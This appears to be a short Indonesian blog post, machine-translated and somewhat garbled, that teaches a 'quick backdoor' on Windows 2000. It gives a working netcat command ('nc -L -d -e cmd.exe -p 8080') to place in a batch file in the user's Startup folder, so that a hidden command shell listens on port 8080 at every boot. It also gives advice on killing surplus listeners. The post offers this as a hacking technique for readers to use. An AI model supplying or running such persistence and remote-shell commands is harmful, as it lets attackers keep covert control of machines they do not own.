http://razor.bindview.com/tools/index.shtml
Cepat Backdoor Pada jendela folder default 2000 pengguna startup terletak di
c: \ Documents and Settings \ username \ Start Menu \ Programs \ Startup
netcat asumsi yang kita miliki dalam c: \ Anda bisa memasukkan sebuah file batch (bat.) dengan perintah netcat yang sebelumnya kita gunakan
c: \ nc-L-d-e cmd.exe-p 8080
Ini akan memulai pendengar netcat pada 8080 setiap kali boot server. Ingatlah untuk membunuh dari pendengar surplus teratur dengan perintah kill.exe (Anda mungkin perlu men-download ini dari situs sumber kit NT online FTP.
Nah Im capek sekarang, harap Anda menikmati itu orang, tetap memilih untuk kita dan terus belajar. Kami akan terus menghasilkan yang terbaik
hal kita bisa.
0 komentar:
Posting Komentar